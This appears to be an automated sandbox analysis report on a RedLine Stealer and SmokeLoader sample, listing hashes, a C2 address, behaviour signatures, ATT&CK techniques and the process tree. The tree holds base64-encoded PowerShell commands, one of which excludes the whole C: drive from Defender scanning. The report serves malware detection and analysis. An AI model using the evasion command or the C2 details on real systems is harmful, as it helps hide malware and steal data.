Analysis

  • max time kernel
    157s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2022 12:52

General

  • Target

    cennik listopad.exe

  • Size

    668.1MB

  • MD5

    aa3934d779b55a03273b3b68ea25f2fe

  • SHA1

    9489523bdd6555cf5eff1f0afd773ed929303eae

  • SHA256

    5b1c29a7dcf64918afe4a0254da1727588719ea1c8cb6ee20432834c362146f3

  • SHA512

    83346493f23dc74216adc71afe9fdad19c12c8aef8cdacb8dc43fd96485feb7fe280cd7313be3a41a5be0100c0b5b9524e9c43814bb5ef67846d19d5d14a3581

  • SSDEEP

    1536:dI47GyTGCwiSnmQUt0LB11s5gmRlmDgkBVyC8nh383NMGPBhQVPOxSwH:dvGyYiSDnt1i5FYDg4V/8n6S0Z7

Malware Config

Extracted

Family

redline

Botnet

V1

C2

45.150.64.103:42708

Attributes
  • auth_value

    ac1e00fc097456e8b89d9ee9bf0f280b

Signatures

  • Detects Smokeloader packer 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cennik listopad.exe
    "C:\Users\Admin\AppData\Local\Temp\cennik listopad.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:724
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3268
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3756
      • C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
        "C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4028
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4944
        • C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
          C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2084
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
        3⤵
        • Executes dropped EXE
        PID:4840

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

3
T1082

Peripheral Device Discovery

1
T1120

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    9f5f12fc2c65784c44b7afb5b14f068f

    SHA1

    2ebcbf1bf9fe8b3b0392b18936ea3bfa631522ff

    SHA256

    58d5c3337077a76429e5dd3dc5d13bb5c482ae783f4a22ee24d04771ecf046c8

    SHA512

    c4fa03da3bab059a9cb0cad00b41d4857d0df06f8ad2c23b283ea5c25b0b5a904e4e29ef6d01e3965119b5a5ff294f3138d5a04add73ec96da2d18ac3e61e818

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    56bab280de1323f632ff79560f35185f

    SHA1

    a81ccbd69bd03d01c6c94fc435d97efd7a0a4f70

    SHA256

    21e7ddc80e86d0164844e3d75bb404c23a01eebe3c4398830a1885ab52b21169

    SHA512

    051a2ced3fd112fc083627bfec8802de727f711b49061e62ddd4c4b5c73bcaa0bd8afd75844e583938fe8427b1b1c50c9453269871a490b410de673129bbda13

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    15KB

    MD5

    8d327505b7b79c265b0e1fe7c85eadc1

    SHA1

    829ab68d23a6301d622d0e7d3470fd175e7d46e9

    SHA256

    fa6272925e6eed310d22a7ba4e06a4e2101c76c13e340ecde20f7b41b44fd5f7

    SHA512

    31ba03865b508ef44d07423184f8937cc65596501908c8bbd92544d662ea9a8cfdc2375dd9e890bf9939f614931dd64925d1153a8ab56a3ee92a68804325cb22

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
    Filesize

    333.8MB

    MD5

    aec0bf1d8e75fd19f0a6121a6b30ecea

    SHA1

    4aabd479f2a262dac8380d0e8fd7dc30ca0a8a20

    SHA256

    3d4f1c8ed4b52f9cee574c477b413d831c86315da24f7734f5dd9eefa055d9de

    SHA512

    4251effd7510deae5fdbbfa6544f04968f4057cf4a735d780fc526e481d920c505b0d10d66b732ed1b12e9f0dbf992fc93a980cf814ddd8c5402de7c95bc2a27

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
    Filesize

    333.8MB

    MD5

    aec0bf1d8e75fd19f0a6121a6b30ecea

    SHA1

    4aabd479f2a262dac8380d0e8fd7dc30ca0a8a20

    SHA256

    3d4f1c8ed4b52f9cee574c477b413d831c86315da24f7734f5dd9eefa055d9de

    SHA512

    4251effd7510deae5fdbbfa6544f04968f4057cf4a735d780fc526e481d920c505b0d10d66b732ed1b12e9f0dbf992fc93a980cf814ddd8c5402de7c95bc2a27

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
    Filesize

    333.8MB

    MD5

    aec0bf1d8e75fd19f0a6121a6b30ecea

    SHA1

    4aabd479f2a262dac8380d0e8fd7dc30ca0a8a20

    SHA256

    3d4f1c8ed4b52f9cee574c477b413d831c86315da24f7734f5dd9eefa055d9de

    SHA512

    4251effd7510deae5fdbbfa6544f04968f4057cf4a735d780fc526e481d920c505b0d10d66b732ed1b12e9f0dbf992fc93a980cf814ddd8c5402de7c95bc2a27

  • C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
    Filesize

    9KB

    MD5

    3426d476f1f6237b1856114997291cf9

    SHA1

    b3899d2a6c1e8eebcf1352809714d3c54b459c9c

    SHA256

    0e07486efde09e4c521a2624a3dd725a0db5c80fd61005f1e6d8a474489ec777

    SHA512

    b930db5e7aaa5990855337f3c7af736605c7d217fa9682358220d28168cb7fc5d1ce7d9f5e8db94b87b4b362100317a334e0b81cfbcfef7f4bef42ece1342542

  • C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
    Filesize

    9KB

    MD5

    3426d476f1f6237b1856114997291cf9

    SHA1

    b3899d2a6c1e8eebcf1352809714d3c54b459c9c

    SHA256

    0e07486efde09e4c521a2624a3dd725a0db5c80fd61005f1e6d8a474489ec777

    SHA512

    b930db5e7aaa5990855337f3c7af736605c7d217fa9682358220d28168cb7fc5d1ce7d9f5e8db94b87b4b362100317a334e0b81cfbcfef7f4bef42ece1342542

  • C:\Users\Admin\AppData\Local\Temp\Zrtviwfrjzvrjkojeverybodyscientific_s.exe
    Filesize

    9KB

    MD5

    3426d476f1f6237b1856114997291cf9

    SHA1

    b3899d2a6c1e8eebcf1352809714d3c54b459c9c

    SHA256

    0e07486efde09e4c521a2624a3dd725a0db5c80fd61005f1e6d8a474489ec777

    SHA512

    b930db5e7aaa5990855337f3c7af736605c7d217fa9682358220d28168cb7fc5d1ce7d9f5e8db94b87b4b362100317a334e0b81cfbcfef7f4bef42ece1342542

  • memory/1264-139-0x0000000008390000-0x00000000083B2000-memory.dmp
    Filesize

    136KB

  • memory/1264-132-0x0000000000000000-mapping.dmp
  • memory/1264-135-0x0000000000670000-0x0000000000680000-memory.dmp
    Filesize

    64KB

  • memory/1264-136-0x0000000005710000-0x0000000005CB4000-memory.dmp
    Filesize

    5.6MB

  • memory/1264-137-0x0000000005050000-0x00000000050E2000-memory.dmp
    Filesize

    584KB

  • memory/1264-138-0x0000000005020000-0x000000000502A000-memory.dmp
    Filesize

    40KB

  • memory/2008-160-0x0000000000000000-mapping.dmp
  • memory/2008-163-0x0000000000EF0000-0x0000000000EF8000-memory.dmp
    Filesize

    32KB

  • memory/2084-180-0x0000000000400000-0x0000000000409000-memory.dmp
    Filesize

    36KB

  • memory/2084-179-0x0000000000400000-0x0000000000409000-memory.dmp
    Filesize

    36KB

  • memory/2084-177-0x0000000000400000-0x0000000000409000-memory.dmp
    Filesize

    36KB

  • memory/2084-176-0x0000000000000000-mapping.dmp
  • memory/3268-140-0x0000000000000000-mapping.dmp
  • memory/3268-141-0x0000000003220000-0x0000000003256000-memory.dmp
    Filesize

    216KB

  • memory/3268-142-0x0000000005930000-0x0000000005F58000-memory.dmp
    Filesize

    6.2MB

  • memory/3268-143-0x0000000006100000-0x0000000006166000-memory.dmp
    Filesize

    408KB

  • memory/3268-144-0x0000000006170000-0x00000000061D6000-memory.dmp
    Filesize

    408KB

  • memory/3268-147-0x0000000006CE0000-0x0000000006CFA000-memory.dmp
    Filesize

    104KB

  • memory/3268-146-0x0000000007E70000-0x00000000084EA000-memory.dmp
    Filesize

    6.5MB

  • memory/3268-145-0x00000000067E0000-0x00000000067FE000-memory.dmp
    Filesize

    120KB

  • memory/3756-156-0x0000000007480000-0x0000000007516000-memory.dmp
    Filesize

    600KB

  • memory/3756-155-0x00000000071B0000-0x00000000071BA000-memory.dmp
    Filesize

    40KB

  • memory/3756-148-0x0000000000000000-mapping.dmp
  • memory/3756-159-0x0000000007460000-0x0000000007468000-memory.dmp
    Filesize

    32KB

  • memory/3756-152-0x0000000007130000-0x0000000007162000-memory.dmp
    Filesize

    200KB

  • memory/3756-153-0x000000006F730000-0x000000006F77C000-memory.dmp
    Filesize

    304KB

  • memory/3756-154-0x0000000006520000-0x000000000653E000-memory.dmp
    Filesize

    120KB

  • memory/3756-157-0x0000000007410000-0x000000000741E000-memory.dmp
    Filesize

    56KB

  • memory/3756-158-0x0000000007520000-0x000000000753A000-memory.dmp
    Filesize

    104KB

  • memory/4028-171-0x0000000000000000-mapping.dmp
  • memory/4840-170-0x0000000005060000-0x000000000509C000-memory.dmp
    Filesize

    240KB

  • memory/4840-164-0x0000000000000000-mapping.dmp
  • memory/4840-169-0x0000000005000000-0x0000000005012000-memory.dmp
    Filesize

    72KB

  • memory/4840-168-0x00000000050C0000-0x00000000051CA000-memory.dmp
    Filesize

    1.0MB

  • memory/4840-167-0x0000000005570000-0x0000000005B88000-memory.dmp
    Filesize

    6.1MB

  • memory/4840-165-0x0000000000400000-0x0000000000428000-memory.dmp
    Filesize

    160KB

  • memory/4944-173-0x0000000000000000-mapping.dmp
  • memory/4944-175-0x0000000070640000-0x000000007068C000-memory.dmp
    Filesize

    304KB